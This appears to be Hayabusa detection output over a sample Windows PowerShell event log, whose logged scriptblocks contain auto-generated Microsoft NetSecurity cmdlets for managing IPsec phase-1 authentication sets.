[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { 
@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 